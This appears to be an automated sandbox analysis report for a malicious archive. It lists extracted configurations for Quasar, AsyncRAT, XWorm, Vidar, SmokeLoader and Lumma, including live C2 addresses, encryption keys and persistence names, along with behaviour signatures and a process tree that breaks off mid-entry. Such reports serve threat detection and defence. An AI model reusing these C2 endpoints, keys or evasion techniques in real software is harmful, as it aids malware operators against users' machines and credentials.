Resubmissions

09/02/2025, 17:26

250209-vzvbzaxpck 10

09/02/2025, 17:22

250209-vxjsfsxqh1 10

09/02/2025, 16:34

250209-t3jtzawper 10

09/02/2025, 16:32

250209-t15nnaxjfv 8

27/01/2025, 22:33

250127-2gt2taxpgv 10

27/01/2025, 22:28

250127-2d6lfaxnhy 10

27/01/2025, 22:21

250127-19myjaxmew 10

Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    27/01/2025, 22:33

General

  • Target

    New Text Document.exe.zip

  • Size

    1KB

  • MD5

    0206983f12db26f622bbe73b165f126f

  • SHA1

    e71f9fc602245a337f728e27917b0b716d3828f9

  • SHA256

    6b81b36622febc198dbe4596349b7b781cd6b278e9db9145a2de8b14b045e128

  • SHA512

    296372c60204ead1709a556001fd2a932e98814d30b42771beb19cc1298f92f3823372a83c1752f49f8073ea238e60f4c5e270a85b6dba2821621e68fd6f5cfc

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

PrudaBackend

C2

45.131.108.110:4782

Mutex

8f8e6059-ac4f-4e47-8d62-3ce070083ecf

Attributes
  • encryption_key

    D82EC4913FC5B28DDFF5AC48635D190A9342C6BD

  • install_name

    update.exe

  • log_directory

    Logs

  • reconnect_delay

    2500

  • startup_key

    Runtime Broker.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

powerstealer

C2

192.168.56.1:4782

Mutex

6760d0e9-9df9-4aba-89be-4e5ce3e92cc8

Attributes
  • encryption_key

    057FCAF700E62ACFECC7338C474084AF9B47ABEB

  • install_name

    powerstealer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

vidar

C2

https://t.me/sc1phell

https://steamcommunity.com/profiles/76561199819539662

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

100.108.37.105:4444

127.0.0.1:4444

Mutex

95a85978-c10d-4a09-935b-c02a2a18a609

Attributes
  • encryption_key

    6FDAA03D192B9C03BF83E41A8BBF78996D321E27

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

xworm

C2

45.141.26.234:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Java Update(32bit).exe

Extracted

Family

smokeloader

Version

2017

C2

http://dogewareservice.ru/

Extracted

Family

xworm

Version

3.1

Mutex

h5HhCg9MKR6vgFJb

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/djZsmRNC

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Program

C2

tuna91.duckdns.org:1604

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    system.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

Mutex

WlO6Om8yfxIARVE4

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/7G6zzQwJ

aes.plain

Extracted

Family

lumma

C2

https://toppyneedus.biz/api

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Detect Vidar Stealer 6 IoCs
  • Detect Xworm Payload 5 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Smokeloader family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Adds policy Run key to start application 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 23 IoCs
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • A potential corporate email address has been identified in the URL: [email protected]
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 4 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 11 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2600
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2800
    • C:\Windows\Explorer.exe
      C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe.zip"
      1⤵
        PID:4168
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        1⤵
        • Drops file in Windows directory
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffe04eccc40,0x7ffe04eccc4c,0x7ffe04eccc58
          2⤵
            PID:2100
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1872,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1868 /prefetch:2
            2⤵
              PID:3644
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2212 /prefetch:3
              2⤵
                PID:2152
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2432 /prefetch:8
                2⤵
                  PID:1864
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3196 /prefetch:1
                  2⤵
                    PID:4632
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3216 /prefetch:1
                    2⤵
                      PID:3576
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4568 /prefetch:1
                      2⤵
                        PID:3332
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4772,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4780 /prefetch:8
                        2⤵
                          PID:2516
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4876 /prefetch:8
                          2⤵
                            PID:2732
                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
                            2⤵
                            • Drops file in Windows directory
                            PID:3996
                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x7ff7c08f4698,0x7ff7c08f46a4,0x7ff7c08f46b0
                              3⤵
                              • Drops file in Windows directory
                              PID:4328
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4460,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5168 /prefetch:1
                            2⤵
                              PID:2620
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4716,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5136 /prefetch:1
                              2⤵
                                PID:1820
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3448,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5128 /prefetch:1
                                2⤵
                                  PID:3856
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3436,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3184 /prefetch:8
                                  2⤵
                                    PID:4460
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3328,i,16397616999320385232,17878501102815736509,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3292 /prefetch:8
                                    2⤵
                                    • Modifies registry class
                                    PID:2436
                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                  1⤵
                                    PID:1504
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                    1⤵
                                      PID:1344
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                      1⤵
                                        PID:4036
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                          2⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3832
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1960 -parentBuildID 20240401114208 -prefsHandle 1860 -prefMapHandle 1868 -prefsLen 26929 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4db4c812-ec67-4520-8555-dbdcb6ce83cc} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" gpu
                                            3⤵
                                              PID:3528
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2352 -prefMapHandle 2340 -prefsLen 26807 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4060c01-b685-4738-8623-50628637eb58} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" socket
                                              3⤵
                                              • Checks processor information in registry
                                              PID:2520
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2904 -childID 1 -isForBrowser -prefsHandle 3004 -prefMapHandle 2928 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82df18bd-b943-45f2-a57b-9bc365935a94} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                              3⤵
                                                PID:4620
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4192 -childID 2 -isForBrowser -prefsHandle 4184 -prefMapHandle 4180 -prefsLen 32181 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3bfeaed9-69e2-4267-83a0-ee4c19a48fc9} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                3⤵
                                                  PID:2424
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4884 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4908 -prefMapHandle 4904 -prefsLen 32181 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {535660d2-1700-425f-a34c-0c6d6731b8f5} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" utility
                                                  3⤵
                                                  • Checks processor information in registry
                                                  PID:4160
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 4916 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba2ed26d-e54a-4625-ba62-19b5ce148ec7} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                  3⤵
                                                    PID:5920
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 4 -isForBrowser -prefsHandle 5512 -prefMapHandle 5508 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a952322-677e-4ce4-a73d-36122661e980} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                    3⤵
                                                      PID:5948
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5740 -prefMapHandle 5736 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23e21ee5-1905-44b1-baea-249637d0ce9b} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                      3⤵
                                                        PID:5960
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6312 -childID 6 -isForBrowser -prefsHandle 6176 -prefMapHandle 6252 -prefsLen 27307 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99eaec29-53e5-4da5-a220-d7b17db6ddf9} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                        3⤵
                                                          PID:2576
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1396 -childID 7 -isForBrowser -prefsHandle 6324 -prefMapHandle 3824 -prefsLen 27307 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37296f14-ebce-4088-aa3a-8a1407a5231b} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                          3⤵
                                                            PID:5356
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 8 -isForBrowser -prefsHandle 5176 -prefMapHandle 5172 -prefsLen 28117 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acc1810d-9f5b-4ac5-b9c4-b1b67b2a826f} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" tab
                                                            3⤵
                                                              PID:5720
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5864 -parentBuildID 20240401114208 -prefsHandle 5632 -prefMapHandle 5916 -prefsLen 33803 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b42ad47-2536-4237-9cf0-33a547e450ae} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" rdd
                                                              3⤵
                                                                PID:5336
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7084 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5420 -prefMapHandle 4680 -prefsLen 33803 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18b02412-98c7-4409-a457-a3027f0a8525} 3832 "\\.\pipe\gecko-crash-server-pipe.3832" utility
                                                                3⤵
                                                                • Checks processor information in registry
                                                                PID:5368
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                            1⤵
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:6044
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffe040346f8,0x7ffe04034708,0x7ffe04034718
                                                              2⤵
                                                                PID:3272
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
                                                                2⤵
                                                                  PID:4464
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
                                                                  2⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1608
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
                                                                  2⤵
                                                                    PID:2580
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
                                                                    2⤵
                                                                      PID:5036
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1
                                                                      2⤵
                                                                        PID:3004
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2580 /prefetch:1
                                                                        2⤵
                                                                          PID:2372
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                                                                          2⤵
                                                                            PID:3508
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:1
                                                                            2⤵
                                                                              PID:4132
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                                                                              2⤵
                                                                                PID:3756
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 /prefetch:8
                                                                                2⤵
                                                                                  PID:4508
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
